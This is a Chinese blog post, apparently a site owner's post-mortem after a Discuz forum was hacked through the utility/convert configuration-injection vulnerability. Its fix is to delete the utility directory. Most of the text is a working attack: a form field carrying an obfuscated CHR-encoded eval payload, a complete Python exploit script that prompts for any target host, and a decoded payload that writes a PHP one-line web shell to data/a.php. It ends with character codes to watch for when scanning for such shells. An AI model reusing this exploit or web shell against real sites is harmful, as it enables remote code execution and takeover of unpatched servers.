140126 discuz站点被黑,复盘

手里一个站点被黑了 也就是大概2013-12-20号左右，乌云爆了一个关于discuz安装包中自带升级转化工具配置未过滤得漏洞，当时没有注意，并不认为自己会犯这样的错。 事实狠狠的给了我一个巴掌。在这里我不得不说discuz,360safe,anquan这类的网站实时性很差。

discuz utility 漏洞修复

删除 utility目录即可。

具体漏洞演示：

访问：www.80aj.com/utility/convert/index.php

修改表单 新增输入项

<input type="text" name="newconfig[aaa eval(CHR(101).CHR(118).CHR(97).CHR(108).CHR(40).CHR(34).CHR(36).CHR(95).CHR(80).CHR(79).CHR(83).
CHR(84).CHR(91).CHR(99).CHR(93).CHR(59).CHR(34).CHR(41).CHR(59));//]" size="40" value="localhost" />

discuz漏洞 直接黑客利用Python代码:

#coding=utf-8
#Nx4dm1n 2013-12
import httplib, urllib
def dzconvertexp(url,vulfile):
    allvulfile=vulfile+'convert/index.php'
    target='http://'+url+vulfile
    page=urllib.urlopen(target)
    html=page.read()
    httpresponse=page.getcode()
    if httpresponse==200:
        httpClient = None
        try:
            params ='a=config&source=d7.2_x2.0&submit=yes&newconfig%5Bsource%5D%5Bdbhost%5D=localhost&newconfig%5Baaa%0D%0A%0D%0Aeval%28CHR%28101%29.CHR%28118%29.CHR%2897%29.CHR%28108%29.CHR%2840%29.CHR%2834%29.CHR%2836%29.CHR%2895%29.CHR%2880%29.CHR%2879%29.CHR%2883%29.CHR%2884%29.CHR%2891%29.CHR%2899%29.CHR%2893%29.CHR%2859%29.CHR%2834%29.CHR%2841%29.CHR%2859%29%29%3B%2F%2F%5D=localhost'
            print params
            headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/html"}
 
            httpClient = httplib.HTTPConnection(url, 80, timeout=10)
            httpClient.request("POST",allvulfile, params, headers)
            response = httpClient.getresponse()
            print response.getheaders()
        except Exception, e:
            print e
        finally:
            if httpClient:
                httpClient.close()
    else:
        print 'no'
 
#输入目标url和convert的目录，常见的是/utility/目录，或者就直接是在根目录下
url=raw_input('Input url(No http):')
dirm=raw_input('Input the convert directory(ex:/utility/):')
dzconvertexp(url,dirm);

//黑客代码 
chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(100).chr(97).chr(116).chr(97).chr(47).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59);

//转换后的值
fputs(fopen('data/a.php','w'),'<?php eval($_POST[cmd])?>');


//其中几个数值是一句话木马必备的  查杀的时候需要分开

chr(101);
chr(118);
chr(97);
chr(108);
chr(69);
chr(86);
chr(65);
chr(76);

资料参考：

http://www.myhack58.com/Article/html/3/62/2013/41505.htm
http://www.wooyun.org/bugs/wooyun-2010-014681
http://www.nxadmin.com/penetration/1224.html